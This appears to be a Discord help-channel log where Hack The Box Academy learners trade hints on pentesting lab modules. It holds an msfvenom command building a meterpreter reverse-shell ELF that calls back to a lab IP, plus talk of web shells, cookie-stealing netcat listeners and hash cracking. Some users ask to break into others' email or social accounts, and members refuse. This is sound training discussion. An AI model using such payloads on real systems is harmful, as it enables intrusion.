#modules

1 messages · Page 43 of 1

sly tapir
#

yea but you are trying to get a response back on your netcat to grab cookie correct?

rustic sage
#

if i buy the student subscription for htb academy does that mean i dont have to pay cubes upto tier 2 modules

fathom pendant
#

As long as you're subbed, yes

#

And if you complete the module iirc you have permanent access

rustic sage
#

will the 8 dollars be deducted automatically every month or do i have to renew it manually

fathom pendant
#

Automatic as long as the payment source is valid

rustic sage
#

what if i want the sub just for a month, i have a lot of free time rn

proud pine
#

You can always cancel right after you subscribe, and it'll remain for the month.

rustic sage
#

alright cool thanks

#

HTB Academy -> Module: File Inclusion -> section : Php filter
Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer
I tried by Source Code Disclosure (convert-base64) , curl , nothing happen any guidance

feral stump
#

hey @fathom pendant can i DM you pls?

fathom pendant
feral stump
#

some advice if you are ok with that

fathom pendant
#

Sorry I'm about to sleep soon so brain is off

feral stump
#

not technical

#

will be quick

fathom pendant
#

Sure

feral stump
#

@high sentinel it's ok if I DM .. MarcieLee is going to bed

#

and need some quick advice

#

sorry to ping like that

high sentinel
#

why don't you just ask here? 😄

feral stump
#

it's a bit professional private advice

#

don't want to show it here

high sentinel
#

why? 😄

feral stump
#

kind of not sharing with all people

#

that's all

high sentinel
#

so you are looking for an advice, that's it? 😄

feral stump
#

yup

#

will be quick

#

seriously

high sentinel
#

well i could probably answer it, but unfortunately i'm about to leave as well 😄

feral stump
#

ok ok

#

may i leave the question on your DM in case you may think of sth?

high sentinel
#

possibly

feral stump
#

ok thx

rugged veldt
#

hey guys im trying to do the medium lab for IDS/IPS evasion. i am currently trying to run a UDP scan tracing the packets with 20 decoys and using the source port as DNS. i am using the sV mode to try grab the version but have been unable to

still kite
#

How can I hack into my old snap account

fathom pendant
feral stump
rugged veldt
fathom pendant
#

Nah using a specific scan type you can get the port every time

rugged veldt
#

after removing both sV and decoys

fathom pendant
#

I've sanity checked it

#

No scripts needed either

rugged veldt
#

what the flyin

feral stump
#

just normal

#

nmap -sU

fathom pendant
#

Nah

#

People keep saying udp is needed on that, but it's not

#

The port is TCP/UDP but it's a specific scan option that will get you it

feral stump
#

how is the nudge without using udp out of curiosity?

brisk geode
#

u dont need to use decoy

#

its just a simple command

rugged veldt
#

sS or sT isnt working for me either

fathom pendant
#

There's a scan that you can copy directly from the IDs/IPS section

#

Just need to change ip

#

And remove the port iirc

rugged veldt
fathom pendant
#

Try running in pwnbox BC I legit sanity checked this the other day

rugged veldt
#

Can I dm u my cmd?

still kite
#

Hey anyone know how to get into a snap account

rich vale
#

anyone that can help me with AD module assessment 2?

#

making progress, but stumped on something

#

just got the flag on SQL01, but not really sure where to go from here

rugged veldt
rugged veldt
#

GOT IT

novel matrix
still kite
#

Ok thx

steady python
#

Is cracking the IPMI password supposed to take a long time? I made it to about 20% in 18 hours and my vm crashed 😭

placid quest
#

@steady python no

steady python
#

Any tips? @placid quest I dumped the hash with metasploit and then ran the hashcat command to crack it

placid quest
#

@steady python use john

steady python
#

Thanks. That was insanely fast.

proud pine
#

Usually, if you're meant to bruteforce something, it will be in rockyou.txt.

steady python
#

I conquer but the way the module is written, it lead me to think I was getting the hash of a randomly generated 8 character password

rustic sage
#

U got this question ?

hushed cosmos
#

Guys im still stuck in academy module about sql essential, can i DM?FeelsWeirdMan

#

sqlmap*

thin sequoia
#

why i get this error ? curl -X PUT http://ip:port/api.php/city/london -d '{"city_name":"flag","country_name":"(UK)"}' -H 'Content-Type: application/json'
Unknown column '' in 'field list'

rustic sage
#

in the Documentation & Reporting Practice Lab
Can anyone please give me a hint for the first question? "Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host". I have from the previous pentester the hash of an admin but this is not an ntlm hash so i'm not sure how to proceed here

thin sequoia
rustic sage
#

Change country_name as per question

thin sequoia
#

i tried that too

rustic sage
thin sequoia
#

ok

orchid ingot
#

Active Directory Enumeration and Attacks Skill Assessment I

I have some questions about it:

  1. Can we compromise the DC without tunneling?
  2. At the last step, I can use crackmapexec to perform command execution but cannot get an interactive shell. Can someone nudge me how to do it?
dire eagle
solid python
orchid ingot
rustic sage
#

I keep getting port 22 connection refused in Linux fundamentals

autumn tundra
#

Good morning. I am working on imap enumeration. I have answered all questions but the last two:
What is the admin email?
Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})

I have connected to the smtp server via open ssl and can login with robins credentials. While on the server it shows there are 0 messages. I am assuming in the email i will get the admin email and the flag? Any assistance will be appreciated

autumn pilot
#

how many inboxes does the user have

solid python
autumn pilot
#

let's avoid the spoilers a bit

#

you have the list of the inboxes, have you tried to go through them?

autumn tundra
#

yeah right when i was typing that i found the message trying to figure out how to list and fetch it

twilit cipher
#

Anyone around that I can bounce some ideas off of for initial access to the "Password Attacks Lab - Hard" module?

marble raft
#

Hi guys need some help on Windows Privilege Escalation Skills Assessment I, having some trouble on getting the exploit onto the box.

Certutil doesn't seem to work, returns an internal error.
Wget also doesn't work

vital adder
twilit cipher
#

Nevermind, found it literally right after I asked.

vital adder
#

nice

rustic sage
#

Hello guys, I'm stuck at decoding this flag using burp suite decoder at the encoding/decoding module: VTJ4U1VrNUZjRlZXVkVKTFZrWkdOVk5zVW10aFZYQlZWRmh3UzFaR2NITlRiRkphWld0d1ZWUllaRXRXUm10M1UyeFNUbVZGY0ZWWGJYaExWa1V3ZVZOc1VsZGlWWEJWVjIxNFMxWkZNVFJUYkZKaFlrVndWVmR0YUV0V1JUQjNVMnhTYTJGM1BUMD0= . Could anyone help me please?

#

Please also tell me how you decoded it

autumn tundra
#

@autumn pilotcan i dm you

autumn tundra
#

i have the mailbox i cant get the fetch command down

rustic sage
graceful rampart
autumn tundra
#

@vital adder i am using that

#

it is not liking my flag commands

#

i know the message is in seen

vital adder
rustic sage
#

but how would i go about it without burp suite? there stands nothing in the module for such tools

proven ingot
rustic sage
proven ingot
graceful rampart
vital adder
#

oh no F psexec that F ing tool wasn't working for me in offshore for no reason and i was stuck for 2 day thinking i was doing something wrong

#

after i found out i can just basically do the same thing with wmiexce everything work just fine that tool save my ass

graceful rampart
#

Yea. Psexec is weird

#

wmiexec is also way better if you care about opsec

#

(Yes I know it's still pretty bad but it's better than psexec)

thorn urchin
#

if youre positive you have valid creds is always worth running down the gammut of options just in case.

graceful rampart
#

Yep

thorn urchin
#

theres always gunna be that one box that just flat doesnt work with your preferred method.

vital adder
thorn urchin
#

I include tickets as valid creds lol

graceful rampart
#

Well I mean, I ticket pretty much is a password lol

#

Sometimes it's better than one

#

Other times you wish you could shove the ticket down the DCs throat

rugged stag
#

I have a question on the "Footprinting / IMAP/POP3" module:

I logged into the IMAP server with the "robin/robin" credentials, selected the inbox and now I'm trying to read the messages. I tried these commands:

||1 fetch 1 all||
||1 fetch 1:4 (BODY[HEADER.FIELDS (Subject)])||

... and similar ones.

They all return the same message:

BAD Error in IMAP command FETCH: Invalid messageset (0.001 + 0.000 secs).

A google search says that this is a bug in dovecot versions 0.99.13 and earlier (see https://bugzilla.redhat.com/show_bug.cgi?id=429100 and http://blog.tcg.com/blog/dovecot_invalid/).

So, my question is:
Am I using the correct command to read the inbox emails? Has anyone had the same problem?

Thanks!

low mica
#

hey i could use some help. im working on password attacks module. im on the ATTACKIN SAM part. i have saved the sam file but when i go to move it to fileshare, it says permission denied and i have literally given full control to every user in regards to that file just to be sure lol

fathom pendant
torn quartz
#

im on the ffuf module

#

doesnt ffuf it just instantly says 39/39 with no output

#

probably a vpn issue

#

but the question is telling me to scan /blog

#

something has to be ther

sly tapir
#

i see those errors ...hmm

torn quartz
#

i dont know why but its def a vpn issue

#

was working fine minutes ago

#

heres the vpn output

ivory dock
#

In the active subdomain enumeration exercises, I'm having issues with the second exercise. I've done a zone transfer and the numbers of zones I submitted from that is incorrect, and I also tried with dnsenum and the number of found subdomains is again, incorrect. I'm not sure what's going on and would appreciate some help

sly tapir
#

yea i had a vpn issue on the NFS assessment...couldnt look at the NFS share...reset and then I could see it...was questioning myself for 30 min

ivory dock
ivory dock
# sly tapir question 2?

yes "Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. "

sly tapir
#

nvrmind...thought you were doing the DNS assessment

ivory dock
#

ahh

torn quartz
fathom pendant
rustic sage
#

hey - how long should it normally take for your own machine to connect to the vpn when running the openvpn command?

rustic sage
stuck hull
#

Do you get an error message?

ivory dock
#

Zone transfers and dnsenum tool

#

also tested for zone transfers of the subdomains and some worked

#

However, none of the numbers I'm finding are correct

rustic sage
ivory dock
#

the funny thing is that I have finished all the other questions, I just cannot finish the second one

proven ingot
ivory dock
#

zone != subdomain

What is the difference exactly? I found this post but don't fully understand it.

orchid ingot
vital adder
#

shoot me a dm

ivory dock
high sentinel
#

sup, anyone looking for help? 😄

ivory dock
high sentinel
#

afaik zone can be a a top level (ie company.com) domain while a subdomain a "subzone" if that makes sense

rustic sage
high sentinel
graceful rampart
#

kek Asking things like this is against the server rules. Id advise you delete that message if you want to remain in this server

ivory dock
high sentinel
#

isn't the difference obvious? example.company.com vs company.com, at least that's my take on that

#

the zone company.com can contain records like server1.company.com, server2.company.com and the subdomain (in DNS terms it's a zone as well) can contain stuff like otherserver1.example.company.com, otherserver2.example.company.com

fathom pendant
#

Then they can have their own subdomains, but that question is specifically asking for the main domain how many

devout torrent
#

I have a question, if I take the Silver Annual Billing, it says I get Direct access to the entire Penetration Tester job role path

But OSINT: Corporate Recon says I still need to pay the cubes?

acoustic owl
devout torrent
#

What you get

Direct access to all modules up to (including) Tier II
Direct access to the entire Bug Bounty Hunter job role path
Direct access to the entire Penetration Tester job role path

  • Unlimited Pwnbox usage
  • CPE credits submission
#

Direct access to the entire Penetration Tester job role path

graceful rampart
devout torrent
acoustic owl
devout torrent
#

but it is

#

check 13.

#

Ah I see now

#

Nevemind, it says "recommended

#

but not actually in the path

#

The actual path has 28 modules, the recommended path has 33

graceful rampart
#

yes

devout torrent
#

I see, I just figured if i tollow the section its the most viable way

mellow turtle
#

hi im having a problem when executing a msfvenom payload:

#

Anyone knows why thats happening? I generated the .elf with this command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.238 LPORT=443 -f elf > shell.elf

#

and waiting for a reverse connection in msfconsole:

high sentinel
#

looks like the x86 is the issue

#

you probably want to use the x64

vital adder
mellow turtle
#

@vital adder ATTACKING ENTERPRISE NETWORKS

mellow turtle
mellow turtle
high sentinel
#

options?

#

what is the exact msfvenom command?

mellow turtle
#

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.238 LPORT=443 -f elf > shell.elf

high sentinel
#

ok, options?

mellow turtle
#

btw in the module they put this:

#

maybe im using the wrong payload in msfconsole

high sentinel
#

you're using different payload

vital adder
#

the payload in your options is generic/shell_reverse_tcp and you are using a linux payload

mellow turtle
#

im using the default and its maybe a non staged

high sentinel
#

you cant combine different payloads

#

go back to x86 and use the same for both msfvenom and msfconsole

mellow turtle
#

xD

torn blade
#

im trying ot get a flag but it keeps giving me errors in my curl command, would i be allowed to send my command and error so someone can tell me what is wrong/what i need to change

#

its a syntax error

high sentinel
#

sure

torn blade
#

curl -X PUT http://161.35.162.53:30564/api.php/city/Detriot -d ‘{“city_name”:“flag”, "country_name":"HTB"}’ -H ‘Content-Type: application/json’
Unknown column '' in 'field list'curl: (3) unmatched close brace/bracket in URL position 17:
country_name:HTB}’

#

eveyrthing after json is an error

high sentinel
#

are you sure you're using correct apostrophes?

torn blade
#

ive treid ' ' and

high sentinel
#

should be used like this -d 'something'

torn blade
#

so the ones next to the 1 key

#

?

autumn tundra
#

is there any fast website for decrypting the impi hash?

#

hashcat is taking foreverrrrrrr

high sentinel
#

i mean like -d '{ "something" : "here"}'

torn blade
#

"Unknown column '' in 'field list'"

#

bruh io hate syntax errors like bruhhhh

#

like when you know the command is right, but the syntax is like "no'

slow hearth
#

is linux well suited as your daily driver for full-stack development?

sterile mirage
#

Hello, I need help with zap, I can't use the zap interface

torn blade
#

okay so the commadn works all the way up to -H 'Content-Type

#

nvm

autumn tundra
#

is there anyway to get around using hashcat to decrypt the impi hash?

fathom pendant
#

I think John can decrypt

midnight jetty
#

yooo

#

have issue with trying to get root flag in privilige escalation

#

when I tried to ssh into root with my id_rsa I'asked for pasword

midnight jetty
#

yeee

lethal atlas
#

did you chmod the id_rsa first?

fathom pendant
#

^ and did you chmod the permission

torn quartz
#

on the ffuf module

midnight jetty
#

yeee 600

torn quartz
#

on the skills examintion

#

is there a way to ffuf with multiple extentions?

fathom pendant
#

And you did root@ip yeah?

midnight jetty
#

yeeee

lethal atlas
midnight jetty
#

ssh root@numbers - p port -i id_rsa

#

and then load key id invalid format

midnight jetty
#

paswsword:

torn quartz
#

i searched on the github there was sum stuff abt a file

#

dirsearch

#

i didnt understand it though

lethal atlas
#

used at the end of the command

torn quartz
#

oh

#

i mustve

#

Oh

#

its cus i did .php, .php7

#

my fault

lethal atlas
torn quartz
#

wasnt meant to put a space

midnight jetty
#

privilige escalation starting point

lethal atlas
#

like on regular htb?

lethal atlas
torn quartz
lethal atlas
torn quartz
#

alright

#

ty

midnight jetty
lethal atlas
#

that'll do it

fathom pendant
fathom pendant
feral willow
#

Yo, i'm working on the File upload module and i got a question: i have to find an extension that is not blacklisted and can execute PHP code on the web server, to read /flag.txt. So i fuzzed extensions with a php-echo payload and found some extensions, which should do the job. upload worked, but when i try to communicate with the webshell, i get a blank page. viewing the source i see the uploaded web shell red underlined with a text: Saw “<?”. Probable cause: Attempt to use an XML processing instruction in HTML. (XML processing instructions are not supported in HTML.) . Any ideas on that? Thx in advice.

tall hawk
#

how can i like become a white hat hacker (hackerone) something about the same as hackerone how can i learn that?

feral willow
tall hawk
#

I do not have acsess to that

cobalt lagoon
#

How do i

fathom pendant
fathom pendant
near anvil
#

For this Module and Question: Footprinting > Host Based Enum > DNS > What is the FQDN of the host where the last octet ends with "x.x.x.203"? Can someone tell me if I have the right wordlist that will answer this question?

fathom pendant
#

Also subdomains of subdomains exist remember that

near anvil
near anvil
fathom pendant
#

Nope

near anvil
#

That was just an example. I can dm you specifics if you want.

fathom pendant
#

But dnsenum tool is based

near anvil
#

That is what I'm using.

near anvil
#

@fathom pendant Thanks for the sanity check and the assitance! 🫂

fathom pendant
#

Npnp

kindred wagon
#

Hello

graceful rampart
#

Asking for those things is agaisnt the rules of this server. Would highly advise you delete that message if you want to stay here

fathom pendant
#

Hi tux

graceful rampart
#

sup

kindred wagon
#

I want not to be hacked, that is, I'm just from Russia and I want to know something)

#

Sorry

#

I just wanted to find out how they do it And so on to get information, I want to apply for a programmer, but I think that I can’t pull profile mathematics, so I’m going to protect information ...

#

what can I learn about here I have a very strong desire, but in Russia they don’t teach this

vital adder
#

if you want to learn how to hack instagram account you can kindly F off but if you want to learn cyber security and don't know where to start give both of these video a check https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM

Introductory video on getting into hacking and cybersecurity.

▶ Play video

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

▶ Play video
fallow tundra
#

hi, i'm a bit stuck in the module "Getting Started" in "Knowledge Check", im in the admin pannel, i know what i have to do (upload a file) but the button to actually upload does not seems to work. i have also tried with metasploit but same thing "upload failed", i have tried to upload a file using wget just in case and it does not work neither? Can you guys tell me if im missing something ? Thanks a lot

rustic sage
#

me gusta chuparle el culo a mi tio

vital adder
vital adder
rustic sage
#

😉

rustic sage
#

i got a 3rd leg rn

#

magic

#

Hi guys, I'm stuck at the Web Assessment for Proxies. /lucky.php I should enable the disabled button. Once I undisabled the button using burp suite or ZAP it send the request with the getflag=true param. But I don't get the flag. Is this normal? How do I get the flag?

#

i am a skid

#

can sm1 teach me

vital adder
#

i did make a bash script for this and i think like out of 100 click i got like 10-20 flag back

rustic sage
quasi wave
#

Has anyone thought of making a more advanced job-role path that picks up where an already existing one left off?

#

I would love an advanced web app hacking path or an advanced penetration testing path

#

Etc

#

Just a thought

vital adder
quasi wave
#

Academy has some advanced modules that aren’t included in job role paths is why I am asking

plush steppe
#

oh god please don't tell me ima have to make a shell

#

oh I def will

fathom pendant
#

Nibbles starting point thing should walk you through it

plush steppe
#

Ye I should be fine

#

also I def need to learn that to succeed

latent meteor
#

hi all, is anyone on the fingerprinting module? am I the only one to whom the footprinting lab machine is constantly dying?

fathom pendant
low mica
#

hey i could use some help. im working on password attacks module. im on the ATTACKIN SAM part. i have saved the sam file but when i go to move it to fileshare, it says permission denied and i have literally given full control to every user in regards to that file just to be sure

latent meteor
# fathom pendant Which footprinting are you having issues with

i have no credentials (assumed and tried the ones from the past levels), can't enumerate any strings on snmp so bruteforcing seemed like an option

thing is, everytime I boot hydra for ssh for example (even with the -t 4 option)
the machine freezes -.-'
need to respawn
https://tenor.com/view/sonic-the-hedgehog-knuckles-knuckles-the-echidna-dancing-dance-gif-17792854
maybe bruteforcing the login is no the way but still quite frustrating

fathom pendant
#

Which part of footprinting are you on, the lab? Easy, med, hard? Hydra isn't needed

#

There's a tool to find the community string for a given domain have you tried using that?

latent meteor
#

hard

fathom pendant
#

Yeah bruteforcing ssh isn't the way to go

#

Snmp is your initial foothold.

latent meteor
fathom pendant
#

Seclist, the footprint word list is just usernames

#

Seclist is nice enough to give us their lists split up in different folders

#

But first you need to find the comm string using one of the tools shown in the module

latent meteor
#

will try other seclists like rockyou or so

fathom pendant
#

¯_(ツ)_/¯

plush steppe
#

so it tells me why this is but could someone explain better?

#

wth @wide path imagine having the same username

high sentinel
#

😄

wide path
#

Hey guys, I'm doing the module Intro to network traffic analysis and I think I spotted an error but I'm not sure that's why I prefer to ask here. In the section TcpDump Packet filtering there is this sentence :

AND as a modifier will show us anything that meets both requirements set. For example, host 10.12.1.122 and tcp port 80 will look for anything from the source host and contain port 80 TCP or UDP traffic

Shouldn't it be ... "the source host and contain port 80 tcp traffic" instead of "80 TCP or UDP traffic" ? In the command there is "tcp port 80" so it filters only tcp port 80 not UDP right ?

high sentinel
plush steppe
#

Why can't I just vim the file and replace the current code* and add a shell

wide path
high sentinel
#

that matches exact host and tcp port 80

wide path
#

yes but the sentence says : port 80 TCP or UDP traffic

high sentinel
#

i'd say that's incorrect then

wide path
#

thanks

high sentinel
#

my just my opinion, you could try testing that yourself locally

#

with something like nc or so

high sentinel
plush steppe
#

I don't need help with anything related to the actual box just the module text I posted

high sentinel
#

yeah i get that

plush steppe
#

What I mean is basically why can't I just edit the file monitor.sh and replace all its previous code with the one liner rshell

high sentinel
#

you possibly can if you have the perms for that, the idea might be that you're gonna break the functionality or possibly spoil the box for other ppl (if that was part of the box)

#

not sure exactly on that, try asking someone else 🤷‍♂️

plush steppe
#

ah ok

#

ty

fathom pendant
#

The point is showing you how to append to a file; the copy part is so that you don't have to reset the box if you bork it hard

high sentinel
#

@fathom pendant just wondering how come you seem to be helping here so much? Is that like your job or so? 😄 👀

plush steppe
#

Idk if there's any way to fix that

#

I should have made a copy

high sentinel
#

😄

high sentinel
plush steppe
#

yeah! 😄

#

I should have listened

high sentinel
#

better listen to it next time then 😄

plush steppe
#

yep!

#

oh it lets me use vim, maybe I'll get lucky and the vim gods will let me do what I want to do

#

nah I'm screwed rip

shadow verge
#

Try extracting data from the db.

marble raft
#

Hi guys any help on Windows Privilege Escalation Skills Assessment - Part II?

Already ran Windows Exploit Suggester, tried a few but nothing seems to work.

buoyant escarp
autumn tundra
#

i got john to crack the ipmi hash i had an issue with earlier. however, now when i use the --show command it says duplicate option and does not work

fathom pendant
#

John saves hashes look where it saved to

#

And it's in there lol

autumn tundra
#

Marcie you are so clutch if this was Twitch id cheers ya

fathom pendant
#

TFW I forget about the trailing . In lookup queries lol

void gate
#

Hey, Thanks for your responses on Moondark's questions, very helpful. My list is 187k long. I've cut the first 17k lines as suggested. My target is active for 80 minutes and I can usually get through ~3500 attempts in that time. I've split the mutated passwords list into 48 splits and am slowly working through them one at a time.
Someone else suggested avoiding brute forcing ssh and instead target a faster service like smb, my question is - is there a way to reduce the wordlist to a reasonable size to crack in one session, or is the module designed to make me process a potential 30+ hours of brute forcing to find the credentials.

buoyant escarp
#

$2y$10$vdrhbczi1dzgzatpdcdg.o6bnalj1cd5hbqhmgjhjw982aijugwby

what kind of hash is this?

buoyant escarp
#

thx

hazy grotto
#

Happy happy friday nerds

plucky current
graceful rampart
steady hawk
#

I'm working through the "Attacking Common Applications" module and we're shown when attacking CMSs to first set up a web-shell and then execute a bash one-liner in order to get a reverse shell. Is there a reason for this two step process? Why not just paste a PHP reverse shell, instead of first a web-shell and then getting a reverse shell?

graceful rampart
#

You don't have to use a webshell first but it's generally a good idea to confirm what you think is happening is actually happening

steady hawk
graceful rampart
#

On top of that, when you care about not getting caught, getting a full reverse shell is very very dangerous and should only be done after you've throughly enumerated your target through a webshell and determined the active defenses

rustic sage
#

anyone done the common applications skill assess 1?

wheat garden
# graceful rampart On top of that, when you care about not getting caught, getting a full reverse s...

not too much opsec discussion on htb cause its unneeded on a sanctioned pentest but more likely adversary be running these tools from some kind of c2 framework or even custom made tools through multiple proxies and may have a machine spun up on a cloud service so if there is computer forensics investigation they will see the I.P and data of your cloud computer and they may even be connected to that through another proxy or 2 of various kinds.

graceful rampart
#

Yes. And I know opsec isn't completely relevant on htb but my career endgoal is redteaming so for me opsec is very relevant

wheat garden
graceful rampart
#

kek You are aware that opsec involves more than just hiding your identity?

#

The whole point of a red team engament is to emulate a real threat actor

wheat garden
graceful rampart
#

Yea but you don't disclose them till after???? Bro the point of a red team engagement is to see what would happen if a real threat actor decided to attack your buisness. That involves staying hidden for as long as possible, which is almost 100% opsec

wheat garden
graceful rampart
#

You're completely misinterpreting that. You need to keep your activity hidden while the engagement is being carried out. Yes, you will disclose everything after but that does not mean you can just get a shell on a machine and run whoami on a red team engament

#

That will get you caught instantly

wheat garden
#

ok well guess your right there is opsec employed during the engagement

#

with the intent of practically destroying all or almost all of your opsec at the end of the engaement

graceful rampart
#

Yes. Opsec does not exclusively cover the methods used to achieve whatever the goal of the engagement was.

#

The methods will always be revealed. Otherwise there would be no point. But the second half of opsec is not getting caught. And that's a very big part of red teaming

#

(Also were very off topic so probably best not to continue this conversation in this channel)

hazy grotto
#

Can someone help me on Attacking Common services hard lab? I'm on the last step and im trying to figure out what i should do....

hazy grotto
warped sun
#

Any tips on how to get a hostname in the nmap enumeration academy module?

#

I tried everything I could think of with nmap, then I tried nc and telnet to each open port, then I tried browsing to the apache server. Couldn't figure out how to connect to back orifice. Arp and ping with name lookup options on didn't help. Tried smbclient because it looks like SAMBA is running on the host. I'm all outta ideas.

warped sun
#

nvm I figured it out. I caught the hostname in output a couple of times but mistook it for nmap artifacting

civic hazel
#

Hello , i need help if there is anyone used DefenderCheck for Av bypass , i try to compile it using visual studio but it refused any help ...

analog heath
#

Hey guys...

#

Ineed help

#

To hack website

thorn urchin
analog heath
#

What.

#

Ohh it's rule 7

#

Sorry for that

#

It's bull shut

#

Group

proud pine
analog heath
#

I'm leaving this group

feral willow
flint depot
#

where is general channel

#

its not appearing

#

help

#

@languid dawn

#

mods

languid dawn
sacred ermine
#

Live Engagement: What is the hostname of Host-1? (Format: all lower case)

#

Module: Shells&payload
Section: Live Engagement: What is the hostname of Host-1? (Format: all lower case)
question: how can I access to web browser? or should I use other tool to get hostname?

rustic sage
#

Why in the Attacking AD module doesnt talk about ASREP-roast attack?

old atlas
#

Module: Attacking Common Services - Easy
What wordlist do I use to brute force the ftp server with || fiona@inlanefreight.htb || , I have tried the provided one, rockyou.txt went up to 20000 which I felt was a bit much and many others. Been stuck here for quite some time now so any help would be appreciated!

acoustic owl
rustic sage
#

How do I go about this question from Web Proxies Assessment? Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload). I'm using Burp suite for fuzzing. For the Payload settings I'm using the alphanum-case.txt. For Payload processing it's following:

  1. Add Prefix: 3dac93b8cd250aa8c1a36fffc79a17a
  2. Base64-encode
  3. Encode as ASCII hex
    At the attack results I noticed every Length was the same and no payload was right. What should I do now?
rustic sage
high sentinel
#

i think you're having a couple of issues there

rustic sage
#

i have entered every possibility manually but still no luck xd

high sentinel
#

why are you using base64 encoding?

rustic sage
#

"while encoding each request with the encoding methods you identified above"

high sentinel
#

hmm, ok then

#

isn't is reversed then? steps 2 and 3?

#

like if you can provide the exact payloads if would probably be much more clear, i haven't done that myself i can't tell without seeing it really

rustic sage
#

this is the md5 where 1 char at the end is missing: 3dac93b8cd250aa8c1a36fffc79a17a

high sentinel
#

and the original cookie looks like? what is some example payload that you're sending?

rustic sage
#

"The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer." this is the md5 cookie

#

example payload: 4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a6335595445335957453d

#

its the hex encoded from the base64 encoded md5 string "3dac93b8cd250aa8c1a36fffc79a17aa"

high sentinel
#

yeah, that looks fine to me

#

yeah, i think the issue is the step 1 then -> append, shoudn't it be prepending instead?

rustic sage
#

"So, try to fuzz the last character of the decoded md5 cookie"

high sentinel
#

solved? 🙂

rustic sage
high sentinel
#

hmm, that's not making sense to me

#

so, let's say that the character is A, how does you generated payload look?

buoyant escarp
#

what wordlist i have to use to crack the pw hash from NOSQLI assessment 2 ?

rustic sage
rustic sage
buoyant escarp
high sentinel
#

what hash type is it?

buoyant escarp
#

blowfish bcrypt

rugged stag
high sentinel
# buoyant escarp blowfish bcrypt

that's generally not easily crackable so you might need a specific dict for that (not sure what) or just try something simple like username, admin or so

solid python
#

The majority of things designed to be cracked on HTB are from rockyou.txt

#

Mostly meant to teach how to crack something rather than expecting you to throw random wordlists at it

pliant sage
#

yo could anyone give me a nudge on the login bruteforcing skill assessment

#

the web login part

placid quest
#

@pliant sage I am stuck on that i got 1234567 as the password but it is not working

pliant sage
#

i got the first password

#

but i can't crack the second login form

#

@placid quest

placid quest
#

@pliant sage The second login page i got the password but the password is not working

pliant sage
#

yeah you probably have the wrong fail string if your password is 123456

placid quest
#

@pliant sage the string is correct

ivory hollow
#

Hi all

i am struck in snmp section of footprint module. at last question .... anyone have clue . please let me know. i already try . snmpwalk command as well. but i am not sure how that answer should look like.

glad wave
#

When you run the snmpwalk what do you see?

mystic tendon
#

is tere anyone just started learning on the academy??

glad wave
#

snmpwalk should give you the answer fairly easy. You will have to let it sit for a little while and youll eventually see what you are looking for

#

if you are doing it from your own VM, try doing it from the browser based pwnbox

#

if the snmpwalk trail doesnt continue for a little while that is

ivory hollow
#

@glad wave dm you. please check

cunning drum
#

@ivory hollow i was also stuck at same problem its very simple . actually when you run onesixtyone you think that there is nothing happening but the output is giving you the community string of the target after getting that community string you should use snmpwalk

#

re read the module very carefully even if you are unable to get the answer dm me

foggy kernel
#

Hello

I hope you are all well 🙂
I'm having an issue on the Getting started module , chapter public exploits
I configured my exploit on metasploit and when i use the cmd exploit the connection with the target drop

ivory hollow
#

@cunning drum .... i solved it... thanks for your kind assistance.

foggy kernel
shut vortex
#

Can anyone point me in the right direction? On the web proxy assessment, I have found the disabled button html... But how can I enable it with burp? Or Zap?.. i can't find anything on how to do this

shadow verge
buoyant escarp
shadow verge
#

try to bruteforce the parameters ( e.g. with regex matchin everything )

steady totem
fathom pendant
#

Don't brute force ssh, it's a slow service to brute

#

Have you tried other lists?

pliant sage
steady totem
pliant sage
#

can anyone give me a nudge for bruteforcing applications - service login skill assessment

pliant sage
sour osprey
#

c./username-anarchy Bill Gates > bill.txt
zsh: permission denied: ./username-anarchy why is it denied? tried it as root aswell stille the same

buoyant escarp
#

is there a javascript function to get a parameter name ?
i want to use this.xxx.startsWith("") to investigate further, but the parameter name is unknown to me.

#

i tried to spray some parameter names just like this.flag...

rustic sage
buoyant escarp
# shadow verge .match(/.*/g)

okey i think you misunderstood me

i need to know the parameter name aka variable, not the value of it
before i can bruteforce its content with eigther .match() or .startsWith() i need to know the parameter name
like this.unknownparameter.match("/.*/g")

shadow verge
#

Can I pm?

buoyant escarp
#

sure

cunning drum
#

how to add role in discord i am htb vip user

#

in academy

rustic sage
proud pine
foggy kernel
#

Hello

Need some help for a chapter on the GETTING start module

steady totem
foggy kernel
#

im a beginner ^^

steady totem
foggy kernel
steady totem
pale egret
#

Can anyone help me by bypassing a gmail password please i really need help

rustic sage
graceful rampart
high sentinel
graceful rampart
#

Well I mean if he owned it then he could probably get into it by hitting "Forgot Password"

pale egret
#

He’s not wrong but in a way i do

graceful rampart
pale egret
#

Its not mine but this dude gave me a stacked steam acc but left it on that gmail but there probably 5k worth of stuff on it

graceful rampart
#

Can't help you.

high sentinel
#

"gave" 😄

pale egret
#

Ok

#

He did

graceful rampart
#

I'd also highly advise you don't ask in this server again if you don't want to get banned

pale egret
#

Alr

rustic sage
#

hey - im currently doing the zap scanner question in the 'using web proxies' module but i cant seem to figure it out. i managed to find the high level vuln but im not sure how to apply it

high sentinel
#

how smb can be giving false positives?

high sentinel
# rustic sage whatcha mean

i you literally said you have an issue with something unspecific 😄 what kind of advice you expecting for that? "turn on your computer"?

rustic sage
#

are you having a bad day today?

high sentinel
#

sounds like anonymous authentication works then? have you tried looking at the traffic or using another tool?

rustic sage
#

i dont want a spoiler

high sentinel
#

cme working for any creds is not making much sense to me, the only reasonable explanation seem to be anon auth

#

